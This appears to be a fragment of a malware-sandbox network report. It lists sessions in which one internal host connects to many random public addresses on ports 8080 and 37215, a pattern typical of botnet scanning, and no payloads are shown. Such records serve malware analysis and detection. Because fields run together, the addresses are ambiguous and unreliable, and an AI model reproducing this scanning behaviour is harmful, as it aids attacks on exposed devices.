                                                        20349192.168.2.235991487.116.93.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20350192.168.2.2360148139.141.159.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20351192.168.2.2338936188.199.71.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20352192.168.2.2336276136.9.252.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20353192.168.2.2341968175.240.156.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20354192.168.2.235858889.159.67.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20355192.168.2.23600428.102.67.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20356192.168.2.2353162115.13.155.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20357192.168.2.2337784115.29.236.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20358192.168.2.233353669.55.152.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20359192.168.2.235178217.153.142.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20360192.168.2.2343676223.102.147.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20361192.168.2.2358446164.231.157.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20362192.168.2.2360060109.250.112.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20363192.168.2.2345064105.239.95.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20364192.168.2.2356758149.41.117.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20365192.168.2.233903066.181.38.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20366192.168.2.2351216183.36.8.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20367192.168.2.2360840162.137.113.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20368192.168.2.2358962197.196.26.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20369192.168.2.235420817.52.221.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20370192.168.2.2350360131.205.195.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20371192.168.2.234095278.223.50.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20372192.168.2.236018881.140.145.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20373192.168.2.2352854161.107.129.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20374192.168.2.233461694.160.227.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20375192.168.2.23600225.251.169.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20376192.168.2.235708666.74.219.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20377192.168.2.2340204208.105.88.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20378192.168.2.234294495.142.78.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20379192.168.2.2354452110.125.183.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20380192.168.2.2350992221.164.206.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20381192.168.2.235361675.38.175.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20382192.168.2.2340882138.23.208.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20383192.168.2.2346770174.42.116.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20384192.168.2.2351824111.185.102.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20385192.168.2.235540691.133.171.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20386192.168.2.2345686207.87.36.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20387192.168.2.2349306172.4.173.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20388192.168.2.2356774202.162.85.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20389192.168.2.2335080219.252.73.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20390192.168.2.2350402101.103.158.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20391192.168.2.234887285.83.144.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20392192.168.2.233546075.143.226.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20393192.168.2.233517843.218.42.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20394192.168.2.2348560218.98.155.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20395192.168.2.2349554146.189.125.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20396192.168.2.234562871.122.205.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20397192.168.2.2358550158.203.192.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20398192.168.2.2339528195.64.188.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20399192.168.2.2344558131.246.90.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20400192.168.2.2337868137.219.38.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20401192.168.2.2357032222.225.153.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20402192.168.2.233916251.193.204.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20403192.168.2.2347784191.139.238.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20404192.168.2.2340250158.101.103.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20405192.168.2.2348164100.191.19.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20406192.168.2.23329241.142.38.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20407192.168.2.2356844144.76.220.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20408192.168.2.233483027.253.113.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20409192.168.2.235057620.200.214.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20410192.168.2.234047094.182.252.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20411192.168.2.2340648180.60.49.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20412192.168.2.235567057.79.19.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20413192.168.2.2347378177.11.53.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20414192.168.2.233494449.154.185.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20415192.168.2.23411529.77.183.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20416192.168.2.2354392173.60.121.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20417192.168.2.235499296.226.16.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20418192.168.2.2357942168.112.197.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20419192.168.2.235401436.227.197.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20420192.168.2.2360112117.91.118.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20421192.168.2.236069660.10.59.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20422192.168.2.2350302149.221.67.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20423192.168.2.235086012.70.235.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20424192.168.2.2334652160.114.107.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20425192.168.2.2342396145.185.245.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20426192.168.2.2347652197.28.30.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20427192.168.2.2348500157.57.139.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20428192.168.2.2360922157.180.161.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20429192.168.2.2354640197.225.129.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20430192.168.2.235280241.180.60.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20431192.168.2.233780041.206.3.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20432192.168.2.233352841.5.72.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20433192.168.2.2360894197.112.58.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20434192.168.2.233506441.164.197.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20435192.168.2.2345634164.125.2.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20436192.168.2.234560841.115.232.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20437192.168.2.2333906197.46.148.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20438192.168.2.233614841.208.51.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20439192.168.2.234291641.215.176.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20440192.168.2.2360234197.74.80.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20441192.168.2.2350062172.38.177.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20442192.168.2.2341612140.183.158.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20443192.168.2.2334176197.231.16.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20444192.168.2.2337398157.106.87.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20445192.168.2.234504441.242.248.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20446192.168.2.2340504157.218.230.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20447192.168.2.2335892157.147.48.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20448192.168.2.2348874197.213.164.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20449192.168.2.234142241.2.240.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20450192.168.2.235995841.162.87.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20451192.168.2.2337258157.108.55.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20452192.168.2.2357028105.226.176.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20453192.168.2.2352258195.165.91.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20454192.168.2.233620435.12.115.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20455192.168.2.2335548197.51.225.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20456192.168.2.2359678197.219.36.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20457192.168.2.2346186157.12.69.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20458192.168.2.2339076197.11.36.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20459192.168.2.2347030117.101.52.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20460192.168.2.2353042157.138.178.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20461192.168.2.2352426197.3.125.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20462192.168.2.234242441.62.41.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20463192.168.2.233766241.152.134.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20464192.168.2.2336522157.72.251.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20465192.168.2.235693637.191.162.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20466192.168.2.2343842197.130.143.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20467192.168.2.235518667.237.111.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20468192.168.2.234359041.154.173.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20469192.168.2.235338224.135.72.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20470192.168.2.2360818157.159.147.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20471192.168.2.2347408157.249.67.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20472192.168.2.233719841.177.213.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20473192.168.2.2359842157.228.120.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20474192.168.2.2353078157.33.40.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20475192.168.2.2349680197.143.133.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20476192.168.2.235573441.204.111.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20477192.168.2.235508641.72.126.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20478192.168.2.2341494157.46.52.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20479192.168.2.234287641.190.151.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20480192.168.2.2350604157.19.141.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20481192.168.2.2358828213.238.73.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20482192.168.2.2341646157.29.224.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20483192.168.2.2355008157.196.251.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20484192.168.2.233662441.118.45.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20485192.168.2.234813668.33.54.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20486192.168.2.234742041.13.241.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20487192.168.2.233343041.131.1.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20488192.168.2.2338606157.204.176.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20489192.168.2.2336414197.223.72.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20490192.168.2.235214241.14.4.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20491192.168.2.234738041.30.95.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20492192.168.2.234838841.208.14.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20493192.168.2.2351682157.13.126.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20494192.168.2.234788095.84.172.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20495192.168.2.234430225.67.190.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20496192.168.2.235167819.177.234.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20497192.168.2.2338234117.115.98.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20498192.168.2.235334441.12.70.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20499192.168.2.23439864.85.153.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20500192.168.2.2349838157.156.47.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20501192.168.2.2341888157.64.157.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20502192.168.2.2342384116.251.201.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20503192.168.2.235365241.93.83.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20504192.168.2.233334641.12.119.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20505192.168.2.234636441.113.133.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20506192.168.2.2342114157.126.61.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20507192.168.2.2333360197.229.30.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20508192.168.2.2338404157.17.243.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20509192.168.2.2353996197.40.184.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20510192.168.2.2348786163.189.100.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20511192.168.2.2345368157.114.118.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20512192.168.2.2336088157.218.13.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20513192.168.2.2343986197.217.52.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20514192.168.2.2342108197.129.153.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20515192.168.2.233306641.124.41.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20516192.168.2.2357510157.14.124.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20517192.168.2.233685041.174.73.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20518192.168.2.2348764157.148.83.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20519192.168.2.2340786157.26.201.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20520192.168.2.233871641.28.236.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20521192.168.2.2354738157.121.253.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20522192.168.2.233726441.78.182.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20523192.168.2.234176667.189.39.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20524192.168.2.2337622157.189.174.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20525192.168.2.234718041.103.69.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20526192.168.2.235158441.30.124.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20527192.168.2.2342870197.28.60.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20528192.168.2.2338020197.180.252.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20529192.168.2.2357004157.78.90.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20530192.168.2.2348126157.111.224.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20531192.168.2.2348508197.255.100.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20532192.168.2.233811466.76.9.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20533192.168.2.2359726157.193.37.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20534192.168.2.2340848197.243.225.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20535192.168.2.234903641.133.82.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20536192.168.2.2351990197.8.146.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20537192.168.2.2339756157.42.13.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20538192.168.2.2334656197.84.220.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20539192.168.2.2334850157.232.141.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20540192.168.2.234525041.83.108.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20541192.168.2.2335564197.196.235.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20542192.168.2.2337862197.50.39.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20543192.168.2.2352346197.204.100.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20544192.168.2.234364041.213.46.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20545192.168.2.233484041.81.151.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20546192.168.2.235404841.51.184.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20547192.168.2.2345382125.6.155.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20548192.168.2.2344462108.192.28.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20549192.168.2.233871441.239.185.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20550192.168.2.2333846197.46.29.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20551192.168.2.2342842100.221.167.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20552192.168.2.234000479.237.95.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20553192.168.2.235663841.101.248.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20554192.168.2.2350576157.112.69.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20555192.168.2.2357284197.76.129.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20556192.168.2.233928841.225.34.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20557192.168.2.2356026157.150.1.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20558192.168.2.2350610191.127.102.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
